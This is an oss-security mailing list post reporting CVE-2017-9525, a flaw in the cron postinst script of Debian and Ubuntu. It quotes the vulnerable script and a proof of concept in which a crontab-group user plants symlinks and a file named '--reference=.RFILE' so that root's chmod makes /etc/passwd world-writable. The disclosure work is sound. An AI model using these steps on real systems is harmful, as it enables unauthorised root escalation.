|
Message-ID: <20170609183124.x5zum2fdfegrnkzp@eldamar.local> Date: Fri, 9 Jun 2017 20:31:24 +0200 From: Salvatore Bonaccorso <carnil@...ian.org> To: oss-security@...ts.openwall.com Subject: Re: Vixie/ISC Cron group crontab to root escalation Hi On Thu, Jun 08, 2017 at 08:05:34PM +0200, Solar Designer wrote: > In 2003, the original patch went from Owl into Debian (and thus Ubuntu), > along with the original comment above: > > https://anonscm.debian.org/cgit/pkg-cron/pkg-cron.git/commit/?id=ce8f4773590dd76505631bd71874e999a85de607 > > Thanks to Salvatore Bonaccorso of Debian for locating the above URL for > the current discussion. In there, we also see the addition of a > postinst script changing permissions on existing crontab files. This > was also pointed out by Seth Arnold of Ubuntu, who wrote: > > | - postinst scripts are already brittle > | - postinst scripts themselves become a target for elevating privileges if > | they'll just set the permissions as needed > | > | But the Debian/Ubuntu packaging already has scripts for this purpose: > | > | http://sources.debian.net/src/cron/3.0pl1-128/debian/postinst/#L53 > | > | ... > | # Fixup crontab , directory and files for new group 'crontab'. > | # Can't use dpkg-statoverride for this because it doesn't cooperate nicely > | # with cron alternatives such as bcron > | if [ -d $crondir/crontabs ] ; then > | chown root:crontab $crondir/crontabs > | chmod 1730 $crondir/crontabs > | # This used to be done conditionally. For versions prior to "3.0pl1-81" > | # It has been disabled to suit cron alternative such as bcron. > | cd $crondir/crontabs > | set +e > | ls -1 | xargs -r -n 1 --replace=xxx chown 'xxx:crontab' 'xxx' > | ls -1 | xargs -r -n 1 chmod 600 > | set -e > | fi > > Qualys promptly broke this script, replying to Seth: > > | Hmmm, you're right, the script itself is vulnerable to > | group-crontab-to-root escalation of privileges: > | > | root@...ian:~# usermod --append --groups crontab nobody > | root@...ian:~# su --login --shell /bin/bash nobody > | No directory, logging in with HOME=/ > | > | nobody@...ian:/$ id > | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),107(crontab) > | > | nobody@...ian:/$ cd /var/spool/cron/crontabs > | > | # for example, this exploits the chown > | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd- nobody > | > | # for example, this exploits the chmod > | nobody@...ian:/var/spool/cron/crontabs$ touch ./--reference=.RFILE > | nobody@...ian:/var/spool/cron/crontabs$ chmod 0666 .RFILE > .RFILE > | nobody@...ian:/var/spool/cron/crontabs$ ln --symbolic /etc/passwd 600 > | > | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd* > | -rw-r--r-- 1 root root 1378 May 10 17:16 /etc/passwd > | -rw------- 1 root root 1378 May 10 17:16 /etc/passwd- > | > | # run the postinst script > | root@...ian:~# dpkg-reconfigure cron > | chown: missing operand > | Try 'chown --help' for more information. > | update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults > | > | nobody@...ian:/var/spool/cron/crontabs$ ls -l /etc/passwd* > | -rw-rw-rw- 1 600 crontab 1378 May 10 17:16 /etc/passwd > | -rw------- 1 nobody crontab 1378 May 10 17:16 /etc/passwd- > | > | So this is a known issue? (there may be more ways to exploit it -- > | spaces, newlines, option injections, etc). > > So this looked like two issues to fix: the temporary file hard link > attack (in OpenBSD, Debian, Ubuntu, ALT Linux, and Owl) and the postinst > script (in Debian and Ubuntu). For the record, the Debian and Ubuntu specific issue with the postinst script has been assigned CVE-2017-9525. For further discussion with the Debian cron maintainers I have as well opened https://bugs.debian.org/864466 Regards, Salvatore
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.